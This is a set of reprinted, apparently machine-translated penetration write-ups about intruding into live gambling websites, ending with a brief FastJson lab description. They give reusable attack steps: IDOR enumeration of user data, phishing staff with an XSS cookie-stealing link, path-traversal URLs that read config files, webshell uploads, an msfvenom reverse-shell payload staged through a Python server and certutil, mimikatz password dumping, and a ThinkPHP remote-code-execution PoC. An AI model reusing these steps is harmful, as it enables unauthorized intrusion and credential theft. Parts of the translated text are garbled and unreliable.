overreach: After some sites log in, the cookie will bring various ids, such as uid=123, groupid=456, telno=135000387465, etc. It is easy to see the meaning of the field, and after changing the value, you will see the data of other users and even administrators; but the cookies here are all sessions, and the fields with various numbers cannot be seen what the meaning is. Use burp to try different values and return status:N, which is also impossible to follow; (4) 0 yuan payment: grab the packet in the payment interface, decode the content of the request packet, and find that there is another sign field inside, and other fields will be checked. If the amount is changed, you need to reverse the verification algorithm and then recalculate the sign value. Here you give up temporarily; PS: User_id is finally exposed here; 3. Through xray scanning, a resin-viewfile vulnerability was found. According to the scan prompt, changing the content of file=xxxx, you can indeed find some files, such as the configuration file below; This vulnerability is similar to SSRF, which can traverse intranet files; then find tools for exploitation in github, and use burp to run dictionary exhaustive directories and files one by one, but only the following files were found, all of which were regular files and paths, and no expected configuration (such as account) files were found; If you want to traverse the C drive, it seems to be protected; This loophole is temporarily abandoned; 4. As of now, it has been found that only XSS can be used, and it is also reflective. You can only find an xss platform to generate a script tag that steals cookies, embed it into the URL with xss vulnerability, and then find the customer service MM to trick it into clicking. As a result, the customer service MM not only did not fall for the fool, but also sent me a new link to let me try a new site again, WTF. Well, try again, so I continue to build a new site; after logging in to the new site with an account, I mainly look for pages that interact with the user (there are a lot of parameters involved, there is a lot of room for changes, and the chance of vulnerabilities is much greater than that of static web pages); I spent a lot of time and checked countless links, and it seemed that there was a turning point, as follows: Here is a json string, which contains various sensitive data such as account name, phone number, nickname, permissions, etc. and there are client keywords in the URL. Is this an interface to view user information? Immediately use burp to grab the packet and change the parameters of pure numbers in the url (pure numbers mean indexing, and are easy to be exhaustive). As expected, the information of some registered users was blown out: 5. In addition, CORS vulnerabilities (a type of CSRF) were also discovered through xray, and we also need to find ways to trick customers, administrators or other users on the platform to click. We will not go into it here for the time being; Summary of this spinach site: 1. The user has strictly restricted the input of form, and both SQL injection and xss are blocked. 2. The resin vulnerability is not painful and cannot get sensitive data. 3. Payment: There is a sign field verification, and the verification algorithm needs to be cracked first. 4. In the end, a page passed the parameter but did not check it. Some user information was blasted by changing the value of the numerical parameter; 5. It may be because of business reasons. The front-end page has not yet found any place to upload files, and it is still impossible to find a way to upload Xiaoma; Reference: 1. https://blkstone.github.io/2017/10/30/resin-attack-vectors/Attack vector collation against Resin services Reprinted from the original link address: https://www.cnblogs.com/theseventhson/p/13738535.html

Information collection is about to start working, someone Penguin chatted privately and asked me to make a lot of money with him. It’s okay to send a group message, but everyone started to chat privately. Now the criminals are so rampant that they can be spoiled. Let’s put the JD card first, and open the front desk to be a gambling forum. A random login, the background came out, the website is from PHP, I tried the common password several times, the admin exists, and the password is incorrect. Put it on Yunxi and take a look. It is very stiff to access the domain name. Let’s take a look at the port again. 3306 is open and the host is from Windows. After the collection was completed, the framework was not scanned out, and there was almost no progress. The only breakthrough point was the background and port. Log in to the background 3306 Try it with a try mentality, nothing unexpected happens, mysql doesn't come out. Top100 backend blasting tried and failed to come out. I don’t have much hope. Looking for JS, there may be passwords, sensitive paths, special interfaces, etc. but it is really clean, maybe I don’t see it carefully. There was no other breakthrough point, so I could only try it out in the backstage. I took a big dictionary and ran for a long time. Finally, I finally figured out that the iron-headed baby is alive. The dictionary used is the abbreviation, year, and special characters. Upload the backend forum article management office saw the editor and his eyes lit up in an instant. Allow single and multiple pictures to try uploading. Cracked, whitelist restriction. Various truncations and bypasses failed. See what editor it is, search for the js file, and find out that it is the wangeditor editor. I searched online and found that there seemed to be no loopholes in this editor, and my ideas have been done~ The turning point appears and continue to search. If you find the order details, you can also download the order picture. Download link: http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20191115/1605370100637841.jpg The website is obtained through the download link. It is guessed that wwwroot is the root directory of the website. Is there any file download available? Try constructing a link: http://www.xxx.com/download.php?filepath=./././wwwroot/news.php Nice, Hu Hansan is finally about to turn over. Continue to look for configuration files, generally index.php will introduce database configuration files. http://www.xxx.com/download.php?filepath=./././wwwroot/index.php Continue to construct and view config.php. http://www.xxx.com/download.php?filepath=././wwwroot/config.php Get the account and try to connect. It prompts that there is no permission or it ends in failure. It is guessed that there is a firewall, or the database host value is set to only access locally. There is no way, continue to flip and try to read the apache configuration file. http://www.xxx.com/download.php?filepath=./././apache/conf/httpd.conf Wang Tefa! HTML files can be executed as php files. Go back to try uploading the file and modify the suffix to upload. Both upload points failed to upload~ Continue to search and find a place to upload avatar in member management. Modify file name upload, respond and return to the upload path. Construct the link download, the file download has been successful, and it is proved to exist. http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20201115/1805872100098841.html Splicing access, successfully parsed. http://www.xxx.com/php/upload/2020xxxx/1805872100098841.html Excited, trembling hands, successful getshell. Suha successfully tried to raise rights and checked the patch status. There were many updates, but there were always fish that missed the net. Use the tool, search directly without patches, exp attacks, the power is upgraded successfully, and the administrator permission is obtained. continues to rebound shells. After all, it is uncomfortable to use terminals, so use MSF to rebound shells here. 1. First, use msf to generate a Trojan file locally and specify the payload; msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe -o achess.exe Record the penetration test experience of the spinach forum 2. Open the python server locally, with the port 8000; python -m http.server 8000 Record the penetration test experience of the spinach forum 3. Place the file in the python server and check that it has been enabled; Download the exe file in the terminal target machine; echo open server ip:8000exe file. Record the penetration test experience of the spinach forum 4. Use reverse_tcp in msf to enable monitoring; handler -p windows/meterpreter_reverse_tcp -H ip -P 4444 5. Execute the exe file and successfully receive the shell. Don't take it lightly when you get the session. MSF comes with mimikatz module. The mimikatz module in MSF supports both 32-bit and 64-bit systems, but this module loads a 32-bit system by default. Therefore, if the target host is a 64-bit system, directly loading the module will cause many functions to be unusable. Therefore, under a 64-bit system, you must first view the system process list, and then migrate the meterpreter process to a 64-bit program process to load mimikatz and view the system plaintext, which also prevents the session from being interrupted. Ps check the process and find a stable process for migration. migrate pid number Migrate the meterpreter process to 408 process: migrate 408 was successfully migrated, everything was there, but the password was missing. Also, use the mimikatz module in MSF to grab the password. First load the mimikatz module: The usage of mimikatz_command module is listed here : meterpreter mimikatz_command -f a: Enter an incorrect module to list all modules meterpreter mimikatz_command -f samdump: can list samdump subcommands meterpreter mimikatz_command -f samdump:hases meterpreter mimikatz_command -f handle:list List application process meterpreter mimikatz_command -f service:list List services meterpreter mimikatz_command -f sekurlsa:searchPasswords meterpreter run post/windows/gather/smart_hashdump Get hash Select the samdump module, which has two functions : ? mimikatz_command -f samdump:hases ? mimikatz_command -f samdump:bootkey But this catches the hash value of the password. I want to see the plaintext password directly, use the searchPasswords function under the sekurlsa module, execute the following command, and successfully crawl the password. mimikatz_command -f sekurlsa:searchPasswords The last 3389 connection was successful and the work was completed. Prove that sometimes it is good to be an iron-headed kid. Summarize From Yunxi, fofa, various plug-ins, subdomain names, port information collection, blasting the background to enter this site (it is very important to have a good dictionary), finding the editor upload file failed, whitelist restrictions, finding the editor name, querying the editor vulnerability is fruitless, finding the function point at the download site, the download link exposes the website path, finding the database configuration file through file download, the connection has no permission, finding the apache configuration file, finding the file suffix can be bypassed, and finding other upload points successfully getshell, and after the privilege operation, using the mimikatz module in MSF to grab the login password, the remote desktop connection is successful, and the penetration is over. Reprinted from the original link: https://cloud.tencent.com/developer/article/1790943

Today, I suddenly found a spinach site while browsing the web page. I won’t post the screenshot of the website. It is said that spinach stations are safer and not easy to penetrate, so I did it today when I had nothing to do. As a result, I just scanned the port and my IP was banned. This is a bit sad, so I can only hang the agent and take a look. I browsed and found that this site should not be the main site, but a side station that handles various activities. And I found a surprise in one of the activities pop-up windows SFZ can be uploaded here, doesn’t that mean there may be a file upload vulnerability? When collecting information, I learned that this server is IIS7.5 Some time ago, just reviewing and analyzing the vulnerability, so let's try whether the vulnerability exists. Made the php's horse into a picture horse for uploading According to the response results, the upload was successful and the address was returned. Next, let's visit It can be seen that the parsing was indeed successful, but unfortunately it cannot be used normally. So then directly change the suffix of php Malaysia to jpg for upload When I visited again, I found that it could be used normally. When I went in, I saw that there were many personal information and transfer screenshots of people. I have to say that spinach harms people. Since you have a webshell, let’s take a look at the current permissions first. It's really hard to deal with, and I once again encountered low permissions. Don't consider raising the rights first, and continue to see if there are any other sensitive documents available. After searching in various directories for a long time, I finally found the configuration file of the database, which is displayed as follows Connect to the database and take a look Found the account and password of the suspected administrator. I tried this and could decrypt it. I was lucky. Next, log in to the background to take a look The result was very disappointed. I originally thought there would be various user information and capital flows. It has reached this point, so I can only continue. Just while thinking about how to raise power, I sighed that Spinach Station is indeed not a false reputation, I found the server's information file under a folder. Pay attention to the file name —— "Server Information". But I was really sleepy and someone gave me a pillow. From this we know that this site should be built on the pagoda and has given the account and password. It's so thoughtful. Try logging in and check it out As shown in the picture, several databases record many sinful money transactions. I won't release it in detail. On the pagoda, the administrator also saw that he changed port 3389 to 19283. Combined with the server account and password given in the previous file, log in and take a look Through a tossing and trying, I found that there are three sites about spinach placed under this server, and the functions are still different. One is the main site, one is the event handling, and the other is the red envelope grab. It's really colorful. Reprinted from the original link: https://www.kngzs.cn/1705.html

I accidentally discovered a thinkphp spinach site. Didn’t there be a loophole in TP recently? Then I tested it casually, but the process was not very smooth, but I finally won it, so I posted this article to share my ideas. 0x00 One-click getshell After a brief look, there should be many people playing, right? Just a few days ago, I wrote a test tool and took it out to test it first. The tool shows a vulnerability One-click getshell, it looks very smooth, haha. But. Xiao Ming shook his hair and found that things were not simple. When the kitchen knife is connected, an error of 500 is returned. We used Firefox's hackbar to verify it. There is nothing wrong with it, so why can't the kitchen knife be connected? As a stingy person, I couldn't help but fall into deep thought. 0x01 Start analysis Because I wrote this tool myself, I found from the picture of getshell above that the third exp is called, so let's analyze it and take a look. Poc as follows /?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir Let's enter whoami after the poc to see the permissions. /?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami iis permission However, some commands can be executed, such as echo dir, etc. 0x02 Try to break through the shell Since we can execute echo, we can try writing a pony. If it succeeds, we will use the pony to upload the pony to do it and do it as soon as we say it. When the hard work comes, we have to write it in line by line. Note: Symbols in the code should be escaped with ^^. For example ?php escaped to ^^?php After the line-by-line writing is completed, I found that it cannot run normally when accessing it. I forgot to take a screenshot here. Next, I tried to download the file to the server using the following method and failed. Just when I was about to give up, I remembered that there was still a download command that was useless. That's certutil.exe Just do it, put Malaysia on our server and enable HFS. Then execute the following command. successfully entered Malaysia, but don’t be too happy too early. Xiao Ming shook his hair again and found that things were even more difficult. Malaysia can operate file upload and change its name, etc. but it cannot edit the file, cannot view the file source code, etc. click to display a blank space. Since that's the case, let's go into the database and take a look. We all know that the database configuration file of TP is in the following location /application/database.php Malaysia cannot be opened, so we can use the tp command to execute the vulnerability and try to use the type command to read this file. /?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=typec:\www\application\database.php The attempt to read type failed, and then the copy command came to mind. Copy database.php to the web root directory and change the name to 1.txt /?s=index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=copyc:\www\application\database.php c:\www\public\1.txt After copying, visit url/1.txt and find that it is empty. 0x03 Successful breakthrough After experiencing a series of failures, I calmed down and thought, and we can also try to read the source code using file_path. Use Dama to upload this file to the root directory, then access it, and successfully obtain the database configuration information. Then fill in the configuration information and enter the database. It was already late at night when this article was written. I looked at the instant noodles I had eaten half of my instant noodles on the table, and finally drank two sips of soup, turned off the phone, and went to bed. Reprinted from the original link: https://www.jianshu.com/p/1f9b02780f1c

fastJson full version Docker vulnerability environment (covers versions 1.2.47/1.2.68/1.2.80, etc.), mainly including JNDI injection, waf bypass, file reading and writing, deserialization, chain detection bypass, and no out-of-network utilization. Set the scenario to black box test, cover the entire process of deep utilization of FastJson from the perspective of black box, and some environments need to be decompiled and analyzed by jar package. Docker environment docker compose up -d If the docker pull environment is slow, please try using domestic mirroring https://www.runoob.com/docker/docker-mirror-acceleration.html After the environment is started, access the corresponding IP port 80: Summary of some common vulnerability exploits for FastJson, which can be used with food: Fastjson full version detection and utilization - Poc Please destroy the environment after use, otherwise it may conflict: docker compose down Organize the order of shooting ranges: (divided into three categories according to the characteristics of utilization) FastJson 1.2.47 1247-jndi 1247-jndi-waf 1247-waf-c3p0 1245-jdk8u342 FastJson 1.2.68 1268-readfile 1268-jkd11-writefile 1268-jdk8-writefile 1268-writefile-jsp 1268-writefile-no-network 1268-jdbc 1268 write a file using another article, which can be used in conjunction with: FastJson1268 write file RCE research FastJson 1.2.80 1280-groovy 1283-serialize There is a flag file hidden in the root directory of each machine, try to get it! Some environments have not been given yet, and they are planning to release them in a while. You are also welcome to submit your wp and suggestions. DOCK environment: https://github.com/lemono0/FastJsonParty